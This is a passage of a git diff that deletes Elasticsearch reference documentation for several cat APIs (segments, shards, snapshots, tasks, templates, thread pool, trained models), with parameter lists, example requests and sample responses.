-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-count] - -`docs.deleted`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-deleted] - -`size`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment-size] - -`size.memory`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=memory] - -`committed`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=committed] - -`searchable`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment-search] - -`version`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment-version] - -`compound`:: -(Default) If `true`, the segment is stored in a compound file. This means Lucene -merged all files from the segment in a single file to save file descriptors. - -`id`:: -ID of the node, such as `k0zy`. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-segments-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cat/segments?v=true --------------------------------------------------- -// TEST[s/^/PUT \/test\/test\/1?refresh\n{"test":"test"}\nPUT \/test1\/test\/1?refresh\n{"test":"test"}\n/] - -The API returns the following response: - -["source","txt",subs="attributes,callouts"] --------------------------------------------------- -index shard prirep ip segment generation docs.count docs.deleted size size.memory committed searchable version compound -test 0 p 127.0.0.1 _0 0 1 0 3kb 2042 false true {lucene_version} true -test1 0 p 127.0.0.1 _0 0 1 0 3kb 2042 false true {lucene_version} true --------------------------------------------------- -// TESTRESPONSE[s/3kb/\\d+(\\.\\d+)?[mk]?b/ s/2042/\\d+/ non_json] diff --git a/docs/reference/cat/shards.asciidoc b/docs/reference/cat/shards.asciidoc deleted file mode 100644 index 54a79c2b999..00000000000 --- a/docs/reference/cat/shards.asciidoc +++ /dev/null @@ -1,406 +0,0 @@ -[[cat-shards]] -=== cat shards API -++++ -cat shards -++++ - -The `shards` command is the detailed view of what nodes contain which -shards. It will tell you if it's a primary or replica, the number of -docs, the bytes it takes on disk, and the node where it's located. - -For data streams, the API returns information about the stream's backing -indices. - - -[[cat-shards-api-request]] -==== {api-request-title} - -`GET /_cat/shards/` - -`GET /_cat/shards` - -[[cat-shards-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. You must -also have the `monitor` or `manage` <> -for any data stream, index, or index alias you retrieve. - -[[cat-shards-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[cat-shards-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ --- -If you do not specify which columns to include, the API returns the default -columns in the order listed below. If you explicitly specify one or more -columns, it only returns the specified columns. - -Valid columns are: - -`index`, `i`, `idx`:: -(Default) Name of the index. - -`shard`, `s`, `sh`:: -(Default) Name of the shard. - -`prirep`, `p`, `pr`, `primaryOrReplica`:: -(Default) Shard type. Returned values are `primary` or `replica`. - -`state`, `st`:: -(Default) State of the shard. Returned values are: -+ -* `INITIALIZING`: The shard is recovering from a peer shard or gateway. -* `RELOCATING`: The shard is relocating. -* `STARTED`: The shard has started. -* `UNASSIGNED`: The shard is not assigned to any node. - -`docs`, `d`, `dc`:: -(Default) Number of documents in shard, such as `25`. - -`store`, `sto`:: -(Default) Disk space used by the shard, such as `5kb`. - -`ip`:: -(Default) IP address of the node, such as `127.0.1.1`. - -`id`:: -(Default) ID of the node, such as `k0zy`. - -`node`, `n`:: -(Default) Node name, such as `I8hydUG`. - -`completion.size`, `cs`, `completionSize`:: -Size of completion, such as `0b`. - -`fielddata.memory_size`, `fm`, `fielddataMemory`:: -Used fielddata cache memory, such as `0b`. - -`fielddata.evictions`, `fe`, `fielddataEvictions`:: -Fielddata cache evictions, such as `0`. - -`flush.total`, `ft`, `flushTotal`:: -Number of flushes, such as `1`. - -`flush.total_time`, `ftt`, `flushTotalTime`:: -Time spent in flush, such as `1`. - -`get.current`, `gc`, `getCurrent`:: -Number of current get operations, such as `0`. - -`get.time`, `gti`, `getTime`:: -Time spent in get, such as `14ms`. - -`get.total`, `gto`, `getTotal`:: -Number of get operations, such as `2`. - -`get.exists_time`, `geti`, `getExistsTime`:: -Time spent in successful gets, such as `14ms`. - -`get.exists_total`, `geto`, `getExistsTotal`:: -Number of successful get operations, such as `2`. - -`get.missing_time`, `gmti`, `getMissingTime`:: -Time spent in failed gets, such as `0s`. - -`get.missing_total`, `gmto`, `getMissingTotal`:: -Number of failed get operations, such as `1`. - -`indexing.delete_current`, `idc`, `indexingDeleteCurrent`:: -Number of current deletion operations, such as `0`. - -`indexing.delete_time`, `idti`, `indexingDeleteTime`:: -Time spent in deletions, such as `2ms`. - -`indexing.delete_total`, `idto`, `indexingDeleteTotal`:: -Number of deletion operations, such as `2`. - -`indexing.index_current`, `iic`, `indexingIndexCurrent`:: -Number of current indexing operations, such as `0`. - -`indexing.index_time`, `iiti`, `indexingIndexTime`:: -Time spent in indexing, such as `134ms`. - -`indexing.index_total`, `iito`, `indexingIndexTotal`:: -Number of indexing operations, such as `1`. - -`indexing.index_failed`, `iif`, `indexingIndexFailed`:: -Number of failed indexing operations, such as `0`. - -`merges.current`, `mc`, `mergesCurrent`:: -Number of current merge operations, such as `0`. - -`merges.current_docs`, `mcd`, `mergesCurrentDocs`:: -Number of current merging documents, such as `0`. - -`merges.current_size`, `mcs`, `mergesCurrentSize`:: -Size of current merges, such as `0b`. - -`merges.total`, `mt`, `mergesTotal`:: -Number of completed merge operations, such as `0`. - -`merges.total_docs`, `mtd`, `mergesTotalDocs`:: -Number of merged documents, such as `0`. - -`merges.total_size`, `mts`, `mergesTotalSize`:: -Size of current merges, such as `0b`. - -`merges.total_time`, `mtt`, `mergesTotalTime`:: -Time spent merging documents, such as `0s`. - -`query_cache.memory_size`, `qcm`, `queryCacheMemory`:: -Used query cache memory, such as `0b`. - -`query_cache.evictions`, `qce`, `queryCacheEvictions`:: -Query cache evictions, such as `0`. - -`recoverysource.type`, `rs`:: -Type of recovery source. - -`refresh.total`, `rto`, `refreshTotal`:: -Number of refreshes, such as `16`. - -`refresh.time`, `rti`, `refreshTime`:: -Time spent in refreshes, such as `91ms`. - -`search.fetch_current`, `sfc`, `searchFetchCurrent`:: -Current fetch phase operations, such as `0`. - -`search.fetch_time`, `sfti`, `searchFetchTime`:: -Time spent in fetch phase, such as `37ms`. - -`search.fetch_total`, `sfto`, `searchFetchTotal`:: -Number of fetch operations, such as `7`. - -`search.open_contexts`, `so`, `searchOpenContexts`:: -Open search contexts, such as `0`. - -`search.query_current`, `sqc`, `searchQueryCurrent`:: -Current query phase operations, such as `0`. - -`search.query_time`, `sqti`, `searchQueryTime`:: -Time spent in query phase, such as `43ms`. - -`search.query_total`, `sqto`, `searchQueryTotal`:: -Number of query operations, such as `9`. - -`search.scroll_current`, `scc`, `searchScrollCurrent`:: -Open scroll contexts, such as `2`. - -`search.scroll_time`, `scti`, `searchScrollTime`:: -Time scroll contexts held open, such as `2m`. - -`search.scroll_total`, `scto`, `searchScrollTotal`:: -Completed scroll contexts, such as `1`. - -`segments.count`, `sc`, `segmentsCount`:: -Number of segments, such as `4`. - -`segments.memory`, `sm`, `segmentsMemory`:: -Memory used by segments, such as `1.4kb`. - -`segments.index_writer_memory`, `siwm`, `segmentsIndexWriterMemory`:: -Memory used by index writer, such as `18mb`. - -`segments.version_map_memory`, `svmm`, `segmentsVersionMapMemory`:: -Memory used by version map, such as `1.0kb`. - -`segments.fixed_bitset_memory`, `sfbm`, `fixedBitsetMemory`:: -Memory used by fixed bit sets for nested object field types and type filters for -types referred in <> fields, such as `1.0kb`. - -`seq_no.global_checkpoint`, `sqg`, `globalCheckpoint`:: -Global checkpoint. - -`seq_no.local_checkpoint`, `sql`, `localCheckpoint`:: -Local checkpoint. - -`seq_no.max`, `sqm`, `maxSeqNo`:: -Maximum sequence number. - -`suggest.current`, `suc`, `suggestCurrent`:: -Number of current suggest operations, such as `0`. - -`suggest.time`, `suti`, `suggestTime`:: -Time spent in suggest, such as `0`. - -`suggest.total`, `suto`, `suggestTotal`:: -Number of suggest operations, such as `0`. - -`sync_id`:: -Sync ID of the shard. - -`unassigned.at`, `ua`:: -Time at which the shard became unassigned in -{wikipedia}/List_of_UTC_time_offsets[Coordinated Universal -Time (UTC)]. - -`unassigned.details`, `ud`:: -Details about why the shard became unassigned. - -`unassigned.for`, `uf`:: -Time at which the shard was requested to be unassigned in -{wikipedia}/List_of_UTC_time_offsets[Coordinated Universal -Time (UTC)]. - -[[reason-unassigned]] -`unassigned.reason`, `ur`:: -Reason the shard is unassigned. Returned values are: -+ -* `ALLOCATION_FAILED`: Unassigned as a result of a failed allocation of the shard. -* `CLUSTER_RECOVERED`: Unassigned as a result of a full cluster recovery. -* `DANGLING_INDEX_IMPORTED`: Unassigned as a result of importing a dangling index. -* `EXISTING_INDEX_RESTORED`: Unassigned as a result of restoring into a closed index. -* `INDEX_CREATED`: Unassigned as a result of an API creation of an index. -* `INDEX_REOPENED`: Unassigned as a result of opening a closed index. -* `NEW_INDEX_RESTORED`: Unassigned as a result of restoring into a new index. -* `NODE_LEFT`: Unassigned as a result of the node hosting it leaving the cluster. -* `REALLOCATED_REPLICA`: A better replica location is identified and causes the existing replica allocation to be cancelled. -* `REINITIALIZED`: When a shard moves from started back to initializing. -* `REPLICA_ADDED`: Unassigned as a result of explicit addition of a replica. -* `REROUTE_CANCELLED`: Unassigned as a result of explicit cancel reroute command. - --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-shards-api-example]] -==== {api-examples-title} - -[[cat-shards-api-example-single]] -===== Example with a single data stream or index - -[source,console] ---------------------------------------------------------------------------- -GET _cat/shards ---------------------------------------------------------------------------- -// TEST[setup:my_index] - -The API returns the following response: - -[source,txt] ---------------------------------------------------------------------------- -my-index-000001 0 p STARTED 3014 31.1mb 192.168.56.10 H5dfFeA ---------------------------------------------------------------------------- -// TESTRESPONSE[s/3014/\\d+/] -// TESTRESPONSE[s/31.1mb/\\d+(\.\\d+)?[kmg]?b/] -// TESTRESPONSE[s/192.168.56.10/.*/] -// TESTRESPONSE[s/H5dfFeA/node-0/ non_json] - -[[cat-shards-api-example-wildcard]] -===== Example with a wildcard pattern - -If your cluster has many shards, you can use a wildcard pattern in the -`` path parameter to limit the API request. - -The following request returns information for any data streams or indices -beginning with `my-index-`. - -[source,console] ---------------------------------------------------------------------------- -GET _cat/shards/my-index-* ---------------------------------------------------------------------------- -// TEST[setup:my_index] - -The API returns the following response: - -[source,txt] ---------------------------------------------------------------------------- -my-index-000001 0 p STARTED 3014 31.1mb 192.168.56.10 H5dfFeA ---------------------------------------------------------------------------- -// TESTRESPONSE[s/3014/\\d+/] -// TESTRESPONSE[s/31.1mb/\\d+(\.\\d+)?[kmg]?b/] -// TESTRESPONSE[s/192.168.56.10/.*/] -// TESTRESPONSE[s/H5dfFeA/node-0/ non_json] - - -[[relocation]] -===== Example with a relocating shard - -[source,console] ---------------------------------------------------------------------------- -GET _cat/shards ---------------------------------------------------------------------------- -// TEST[skip:for now, relocation cannot be recreated] - -The API returns the following response: - -[source,txt] ---------------------------------------------------------------------------- -my-index-000001 0 p RELOCATING 3014 31.1mb 192.168.56.10 H5dfFeA -> -> 192.168.56.30 bGG90GE ---------------------------------------------------------------------------- -// TESTRESPONSE[non_json] - -The `RELOCATING` value in `state` column indicates the index shard is -relocating. - -[[states]] -===== Example with a shard states - -Before a shard is available for use, it goes through an `INITIALIZING` state. -You can use the cat shards API to see which shards are initializing. - -[source,console] ---------------------------------------------------------------------------- -GET _cat/shards ---------------------------------------------------------------------------- -// TEST[skip:there is no guarantee to test for shards in initializing state] - -The API returns the following response: - -[source,txt] ---------------------------------------------------------------------------- -my-index-000001 0 p STARTED 3014 31.1mb 192.168.56.10 H5dfFeA -my-index-000001 0 r INITIALIZING 0 14.3mb 192.168.56.30 bGG90GE ---------------------------------------------------------------------------- -// TESTRESPONSE[non_json] - -===== Example with reasons for unassigned shards - -The following request returns the `unassigned.reason` column, which indicates -why a shard is unassigned. - - -[source,console] ---------------------------------------------------------------------------- -GET _cat/shards?h=index,shard,prirep,state,unassigned.reason ---------------------------------------------------------------------------- -// TEST[skip:for now] - -The API returns the following response: - -[source,txt] ---------------------------------------------------------------------------- -my-index-000001 0 p STARTED 3014 31.1mb 192.168.56.10 H5dfFeA -my-index-000001 0 r STARTED 3014 31.1mb 192.168.56.30 bGG90GE -my-index-000001 0 r STARTED 3014 31.1mb 192.168.56.20 I8hydUG -my-index-000001 0 r UNASSIGNED ALLOCATION_FAILED ---------------------------------------------------------------------------- -// TESTRESPONSE[non_json] diff --git a/docs/reference/cat/snapshots.asciidoc b/docs/reference/cat/snapshots.asciidoc deleted file mode 100644 index 2bce47e3ed9..00000000000 --- a/docs/reference/cat/snapshots.asciidoc +++ /dev/null @@ -1,139 +0,0 @@ -[[cat-snapshots]] -=== cat snapshots API -++++ -cat snapshots -++++ - -Returns information about the <> stored in one or -more repositories. A snapshot is a backup of an index or running {es} cluster. - - -[[cat-snapshots-api-request]] -==== {api-request-title} - -`GET /_cat/snapshots/` - -[[cat-snapshots-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`monitor_snapshot`, `create_snapshot`, or `manage` -<> to use this API. - - -[[cat-snapshots-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Required, string) Snapshot repository used to limit the request. - -If the repository fails during the request, {es} returns an error. --- - - -[[cat-snapshots-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ --- -If you do not specify which columns to include, the API returns the default -columns in the order listed below. If you explicitly specify one or more -columns, it only returns the specified columns. - -Valid columns are: - -`id`, `snapshot`:: -(Default) ID of the snapshot, such as `snap1`. - -`repository`, `re`, `repo`:: -(Default) Name of the repository, such as `repo1`. - -`status`, `s`:: -(Default) State of the snapshot process. Returned values are: -+ -* `FAILED`: The snapshot process failed. -* `INCOMPATIBLE`: The snapshot process is incompatible with the current cluster -version. -* `IN_PROGRESS`: The snapshot process started but has not completed. -* `PARTIAL`: The snapshot process completed with a partial success. -* `SUCCESS`: The snapshot process completed with a full success. - -`start_epoch`, `ste`, `startEpoch`:: -(Default) {wikipedia}/Unix_time[Unix `epoch` time] at which -the snapshot process started. - -`start_time`, `sti`, `startTime`:: -(Default) `HH:MM:SS` time at which the snapshot process started. - -`end_epoch`, `ete`, `endEpoch`:: -(Default) {wikipedia}/Unix_time[Unix `epoch` time] at which -the snapshot process ended. - -`end_time`, `eti`, `endTime`:: -(Default) `HH:MM:SS` time at which the snapshot process ended. - -`duration`, `dur`:: -(Default) Time it took the snapshot process to complete in <>. - -`indices`, `i`:: -(Default) Number of indices in the snapshot. - -`successful_shards`, `ss`:: -(Default) Number of successful shards in the snapshot. - -`failed_shards`, `fs`:: -(Default) Number of failed shards in the snapshot. - -`total_shards`, `ts`:: -(Default) Total number of shards in the snapshot. - -`reason, `r`:: -Reason for any snapshot failures. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -`ignore_unavailable`:: -(Optional, Boolean) If `true`, the response does not include information from -unavailable snapshots. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-snapshots-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cat/snapshots/repo1?v=true&s=id --------------------------------------------------- -// TEST[s/^/PUT \/_snapshot\/repo1\/snap1?wait_for_completion=true\n/] -// TEST[s/^/PUT \/_snapshot\/repo1\/snap2?wait_for_completion=true\n/] -// TEST[s/^/PUT \/_snapshot\/repo1\n{"type": "fs", "settings": {"location": "repo\/1"}}\n/] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -id status start_epoch start_time end_epoch end_time duration indices successful_shards failed_shards total_shards -snap1 FAILED 1445616705 18:11:45 1445616978 18:16:18 4.6m 1 4 1 5 -snap2 SUCCESS 1445634298 23:04:58 1445634672 23:11:12 6.2m 2 10 0 10 --------------------------------------------------- -// TESTRESPONSE[s/FAILED/SUCCESS/ s/14456\d+/\\d+/ s/\d+(\.\d+)?(m|s|ms)/\\d+(\\.\\d+)?(m|s|ms)/] -// TESTRESPONSE[s/\d+:\d+:\d+/\\d+:\\d+:\\d+/] -// TESTRESPONSE[s/1 4 1 5/\\d+ \\d+ \\d+ \\d+/] -// TESTRESPONSE[s/2 10 0 10/\\d+ \\d+ \\d+ \\d+/] -// TESTRESPONSE[non_json] - diff --git a/docs/reference/cat/tasks.asciidoc b/docs/reference/cat/tasks.asciidoc deleted file mode 100644 index 261955235a1..00000000000 --- a/docs/reference/cat/tasks.asciidoc +++ /dev/null @@ -1,85 +0,0 @@ -[[cat-tasks]] -=== cat task management API -++++ -cat task management -++++ - -beta::["The cat task management API is new and should still be considered a beta feature. The API may change in ways that are not backwards compatible.",{es-issue}51628] - -Returns information about tasks currently executing in the cluster, -similar to the <> API. - - -[[cat-tasks-api-request]] -==== {api-request-title} - -`GET /_cat/tasks` - -[[cat-tasks-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-tasks-api-desc]] -==== {api-description-title} - -The cat task management API returns information -about tasks currently executing -on one or more nodes in the cluster. -It is a more compact view -of the JSON <> API. - - -[[cat-tasks-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=detailed] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -`nodes`:: -(Optional, string) -Comma-separated list of node IDs or names used to limit the response. Supports -wildcard (`*`) expressions. - -`parent_task_id`:: -(Optional, string) -Parent task ID used to limit the response. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-tasks-api-response-codes]] -==== {api-response-codes-title} - -include::{es-repo-dir}/cluster/tasks.asciidoc[tag=tasks-api-404] - - -[[cat-tasks-api-examples]] -==== {api-examples-title} - -[source,console] ----- -GET _cat/tasks?v=true ----- -// TEST[skip:No tasks to retrieve] - -The API returns the following response: - -[source,console-result] ----- -action task_id parent_task_id type start_time timestamp running_time ip node -cluster:monitor/tasks/lists[n] oTUltX4IQMOUUVeiohTt8A:124 oTUltX4IQMOUUVeiohTt8A:123 direct 1458585884904 01:48:24 44.1micros 127.0.0.1:9300 oTUltX4IQMOUUVeiohTt8A -cluster:monitor/tasks/lists oTUltX4IQMOUUVeiohTt8A:123 - transport 1458585884904 01:48:24 186.2micros 127.0.0.1:9300 oTUltX4IQMOUUVeiohTt8A ----- -// TESTRESPONSE[skip:No tasks to retrieve] -// TESTRESPONSE[non_json] diff --git a/docs/reference/cat/templates.asciidoc b/docs/reference/cat/templates.asciidoc deleted file mode 100644 index 8650e3d4dab..00000000000 --- a/docs/reference/cat/templates.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ -[[cat-templates]] -=== cat templates API -++++ -cat templates -++++ - -Returns information about <> in a cluster. -You can use index templates to apply <> -and <> to new indices at creation. - - -[[cat-templates-api-request]] -==== {api-request-title} - -`GET /_cat/templates/` - -`GET /_cat/templates` - -[[cat-templates-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-templates-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) Comma-separated list of index template names used to limit -the request. Accepts wildcard expressions. - - -[[cat-templates-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-templates-api-example]] -==== {api-examples-title} - -[source,console] ----- -GET _cat/templates/my-template-*?v=true&s=name ----- -// TEST[s/^/PUT _index_template\/my-template-0\n{"index_patterns": "te*", "priority": 200}\n/] -// TEST[s/^/PUT _index_template\/my-template-1\n{"index_patterns": "tea*", "priority": 201}\n/] -// TEST[s/^/PUT _index_template\/my-template-2\n{"index_patterns": "teak*", "priority": 202, "version": 7}\n/] - -The API returns the following response: - -[source,txt] ----- -name index_patterns order version composed_of -my-template-0 [te*] 200 [] -my-template-1 [tea*] 201 [] -my-template-2 [teak*] 202 7 [] ----- -// TESTRESPONSE[s/\*/\\*/ s/\[/\\[/ s/\]/\\]/ non_json] - -//// -[source,console] ----- -DELETE _index_template/my-template-0 -DELETE _index_template/my-template-1 -DELETE _index_template/my-template-2 ----- -// TEST[continued] -//// diff --git a/docs/reference/cat/thread_pool.asciidoc b/docs/reference/cat/thread_pool.asciidoc deleted file mode 100644 index 7bc1598515e..00000000000 --- a/docs/reference/cat/thread_pool.asciidoc +++ /dev/null @@ -1,178 +0,0 @@ -[[cat-thread-pool]] -=== cat thread pool API -++++ -cat thread pool -++++ - -Returns thread pool statistics for each node in a cluster. Returned information -includes all <> and custom thread -pools. - - -[[cat-thread-pool-api-request]] -==== {api-request-title} - -`GET /_cat/thread_pool/` - -`GET /_cat/thread_pool` - -[[cat-thread-pool-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-thread-pool-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) Comma-separated list of thread pool names used to limit the -request. Accepts wildcard expressions. - - -[[cat-thread-pool-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ --- -If you do not specify which columns to include, the API returns the default -columns in the order listed below. If you explicitly specify one or more -columns, it only returns the specified columns. - -Valid columns are: - -`node_name`:: -(Default) Node name, such as `I8hydUG`. - -`name`:: -(Default) Name of the thread pool, such as `analyze` or `generic`. - -`active`, `a`:: -(Default) Number of active threads in the current thread pool. - -`queue`,`q`:: -(Default) Number of tasks in the queue for the current thread pool. - -`rejected`, `r`:: -(Default) Number of tasks rejected by the thread pool executor. - -`completed`, `c`:: -Number of tasks completed by the thread pool executor. - -`core`, `cr`:: -Configured core number of active threads allowed in the current thread pool. - -`ephemeral_id`,`eid`:: -Ephemeral node ID. - -`host`, `h`:: -Hostname for the current node. - -`ip`, `i`:: -IP address for the current node. - -`keep_alive`, `k`:: -Configured keep alive time for threads. - -`largest`, `l`:: -Highest number of active threads in the current thread pool. - -`max`, `mx`:: -Configured maximum number of active threads allowed in the current thread pool. - -`node_id`, `id`:: -ID of the node, such as `k0zy`. - -`pid`, `p`:: -Process ID of the running node. - -`pool_size`, `psz`:: -Number of threads in the current thread pool. - -`port`, `po`:: -Bound transport port for the current node. - -`queue_size`, `qs`:: -Maximum number of tasks permitted in the queue for the current thread pool. - -`size`, `sz`:: -Configured fixed number of active threads allowed in the current thread pool. - -`type`, `t`:: -Type of thread pool. Returned values are `fixed` or `scaling`. - --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -`size`:: -(Optional, <>) Multiplier used to display quantities. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-thread-pool-api-example]] -==== {api-examples-title} - -[[cat-thread-pool-api-ex-default]] -===== Example with default columns - -[source,console] --------------------------------------------------- -GET /_cat/thread_pool --------------------------------------------------- - -The API returns the following response: - -[source,txt] --------------------------------------------------- -node-0 analyze 0 0 0 -... -node-0 fetch_shard_started 0 0 0 -node-0 fetch_shard_store 0 0 0 -node-0 flush 0 0 0 -... -node-0 write 0 0 0 --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./(node-0 \\S+ 0 0 0\n)*/] -// TESTRESPONSE[s/\d+/\\d+/ non_json] -// The substitutions do two things: -// 1. Expect any number of extra thread pools. This allows us to only list a -// few thread pools. The list would be super long otherwise. In addition, -// if xpack is installed then the list will contain more thread pools and -// this way we don't have to assert about them. -// 2. Expect any number of active, queued, or rejected items. We really don't -// know how many there will be and we just want to assert that there are -// numbers in the response, not *which* numbers are there. - - -[[cat-thread-pool-api-ex-headings]] -===== Example with explicit columns - -The following API request returns the `id`, `name`, `active`, `rejected`, and -`completed` columns. The request limits returned information to the `generic` -thread pool. - -[source,console] --------------------------------------------------- -GET /_cat/thread_pool/generic?v=true&h=id,name,active,rejected,completed --------------------------------------------------- - -The API returns the following response: - -[source,txt] --------------------------------------------------- -id name active rejected completed -0EWUhXeBQtaVGlexUeVwMg generic 0 0 70 --------------------------------------------------- -// TESTRESPONSE[s/0EWUhXeBQtaVGlexUeVwMg/[\\w-]+/ s/\d+/\\d+/ non_json] - diff --git a/docs/reference/cat/trainedmodel.asciidoc b/docs/reference/cat/trainedmodel.asciidoc deleted file mode 100644 index f3783c25c1d..00000000000 --- a/docs/reference/cat/trainedmodel.asciidoc +++ /dev/null @@ -1,125 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[cat-trained-model]] -=== cat trained model API -++++ -cat trained model -++++ - -Returns configuration and usage information about {infer} trained models. - - -[[cat-trained-model-request]] -==== {api-request-title} - -`GET /_cat/ml/trained_models` - - -[[cat-trained-model-prereqs]] -==== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following -privileges: - -* cluster: `monitor_ml` - -For more information, see <> and {ml-docs-setup-privileges}. - - -//// -[[cat-trained-model-desc]] -==== {api-description-title} -//// - - -[[cat-trained-model-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ -If you do not specify which columns to include, the API returns the default -columns. If you explicitly specify one or more columns, it returns only the -specified columns. -+ -Valid columns are: - -`create_time`, `ct`::: -The time when the trained model was created. - -`created_by`, `c`, `createdBy`::: -Information on the creator of the trained model. - -`data_frame_analytics_id`, `df`, `dataFrameAnalytics`::: -Identifier for the {dfanalytics-job} that created the model. Only displayed if -it is still available. - -`description`, `d`::: -The description of the trained model. - -`heap_size`, `hs`, `modelHeapSize`::: -(Default) -The estimated heap size to keep the trained model in memory. - -`id`::: -(Default) -Idetifier for the trained model. - -`ingest.count`, `ic`, `ingestCount`::: -The total number of documents that are processed by the model. - -`ingest.current`, `icurr`, `ingestCurrent`::: -The total number of document that are currently being handled by the trained -model. - -`ingest.failed`, `if`, `ingestFailed`::: -The total number of failed ingest attempts with the trained model. - -`ingest.pipelines`, `ip`, `ingestPipelines`::: -(Default) -The total number of ingest pipelines that are referencing the trained model. - -`ingest.time`, `it`, `ingestTime`::: -The total time that is spent processing documents with the trained model. - -`license`, `l`::: -The license level of the trained model. - -`operations`, `o`, `modelOperations`::: -(Default) -The estimated number of operations to use the trained model. This number helps -measuring the computational complexity of the model. - -`version`, `v`::: -The {es} version number in which the trained model was created. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-trained-model-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _cat/ml/trained_models?h=c,o,l,ct,v&v=ture --------------------------------------------------- -// TEST[skip:kibana sample data] - - -[source,console-result] ----- -id created_by operations license create_time version -ddddd-1580216177138 _xpack 196 PLATINUM 2020-01-28T12:56:17.138Z 8.0.0 -flight-regress-1580215685537 _xpack 102 PLATINUM 2020-01-28T12:48:05.537Z 8.0.0 -lang_ident_model_1 _xpack 39629 BASIC 2019-12-05T12:28:34.594Z 7.6.0 ----- -// TESTRESPONSE[skip:kibana sample data] diff --git 